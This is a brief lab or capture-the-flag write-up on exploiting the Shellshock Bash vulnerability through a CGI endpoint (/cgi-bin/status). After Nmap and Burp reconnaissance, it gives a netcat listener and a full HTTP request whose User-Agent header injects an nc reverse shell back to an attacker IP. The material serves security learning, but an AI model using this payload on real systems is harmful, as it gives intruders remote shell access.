Bob1Bob2

So it is said that if you know your enemies and know yourself, you will not be put at risk even if you have a hundred battles. —– The Art of War

This vulnerability impacts the Bourne Again Shell “Bash”. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface “CGI”.

Difficluty: 1/5

Forces:

• Nmap
• Burp
• Firebug
• NC

Detail Assessment and Planning

• Port scan to identify opened ports, running services and services version. —-Nmap
• Identify vulnerability and path /cgi-bin/status. —-Burp, Firebug
• Exploit shellshock vuln get the reverse shell —- NC

Waging War

Weaknesses and Strengths

Used Nmap to idenfity opened ports. TCP port 80 is opened and Apache service is running on it.

By visiting the application with Burp, I can detect that multiple URL are accessed when the page is loaded:

Also by using Firebug, I can identify that CGI page which call system command /cgi-bin/status

Attack

listen port 443

# nc -l -p 443

exploit

1

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.79.156 443 -e /bin/sh\r\nHost: 192.168.79.164\r\nConnection: close\r\n\r\n" | nc 192.168.79.164 80

192.168.79.156 is the attacker’s machine and 192.168.79.164 is victim machine.